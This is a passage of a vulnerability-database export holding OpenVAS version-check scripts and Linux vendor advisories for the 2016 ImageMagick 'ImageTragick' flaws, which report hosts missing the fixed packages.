USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871609\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:03 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ImageMagick RHSA-2016:0726-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0726-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-May/msg00010.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:26:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2016-05-05T00:00:00", "id": "OPENVAS:1361412562310807568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807568", "type": "openvas", "title": "ImageMagick Multiple Vulnerabilities May16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ImageMagick Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:imagemagick:imagemagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807568\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-05 14:06:00 +0530 (Thu, 05 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"ImageMagick Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - Insufficient filtering for filename passed to delegate's command.\n\n - An error in ImageMagick's ephemeral pseudoprotocol.\n\n - An error in ImageMagick's msl pseudo protocol.\n\n - An error in ImageMagick's label pseudo protocol.\n\n - An SSRF vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, to delete arbitrary files, to move image\n files to file with any extension in any folder, to get content of the files\n from the server.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick versions before 6.9.3-10\n and 7.x before 7.0.1-1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ImageMagick version\n 6.9.3-10 or 7.0.1-1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/05/03/18\");\n script_xref(name:\"URL\", value:\"https://imagetragick.com\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_imagemagick_detect_win.nasl\");\n script_mandatory_keys(\"ImageMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!imVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:imVer, test_version:\"6.9.3.10\"))\n{\n fix = \"6.9.3.10\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:imVer, test_version:\"7.0.0\", test_version2:\"7.0.1.0\"))\n{\n fix = \"7.0.1.1\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:imVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "modified": "2019-03-18T00:00:00", "published": "2016-05-16T00:00:00", "id": "OPENVAS:1361412562310703580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703580", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703580\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3580.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"imagemagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name:\"summary\", value:\"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:57:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120688", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-699)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120688\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:07 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-699)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in ImageMagick. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update ImageMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\");\n script_cve_id(\"CVE-2016-3718\", \"CVE-2016-3717\", \"CVE-2016-3716\", \"CVE-2016-3715\", \"CVE-2016-3714\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled. They can be re-enabled by exporting the\n following environment variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vu\n lnerable/ (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "edition": 1, "modified": "2016-05-11T17:08:09", "published": "2016-05-11T17:08:09", "id": "SUSE-SU-2016:1275-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00032.html", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing "/etc/ImageMagick-*/policy.xml" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2016-05-07T18:07:43", "published": "2016-05-07T18:07:43", "id": "OPENSUSE-SU-2016:1266-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00028.html", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\n\n", "edition": 1, "modified": "2016-05-07T14:07:41", "published": "2016-05-07T14:07:41", "id": "OPENSUSE-SU-2016:1261-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00025.html", "title": "Security update for ImageMagick (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:35:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing "/etc/ImageMagick-*/policy.xml" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "edition": 1, "modified": "2016-05-07T13:08:32", "published": "2016-05-07T13:08:32", "id": "SUSE-SU-2016:1260-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00024.html", "title": "Security update for ImageMagick (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", 